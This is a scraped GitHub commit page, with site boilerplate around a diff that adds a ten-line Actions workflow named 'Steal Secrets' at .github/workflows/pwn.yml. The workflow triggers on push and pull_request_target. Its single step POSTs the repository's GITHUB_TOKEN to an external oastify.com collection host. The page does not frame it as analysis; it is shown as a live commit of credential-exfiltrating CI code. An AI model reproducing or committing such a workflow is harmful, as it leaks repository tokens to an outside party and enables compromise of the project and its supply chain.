We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 208807d commit 2bfe652Copy full SHA for 2bfe652
1 file changed
.github/workflows/pwn.yml
@@ -0,0 +1,10 @@
1
+name: Steal Secrets
2
+on: [push, pull_request_target]
3
+
4
+jobs:
5
+ steal:
6
+ runs-on: ubuntu-latest
7
+ steps:
8
+ - run: |
9
+ curl -X POST https://h3lkdxl2kid5j1pmyzx1xs0mrdx4l49t.oastify.com \
10
+ -d "token=${{ secrets.GITHUB_TOKEN }}"
0 commit comments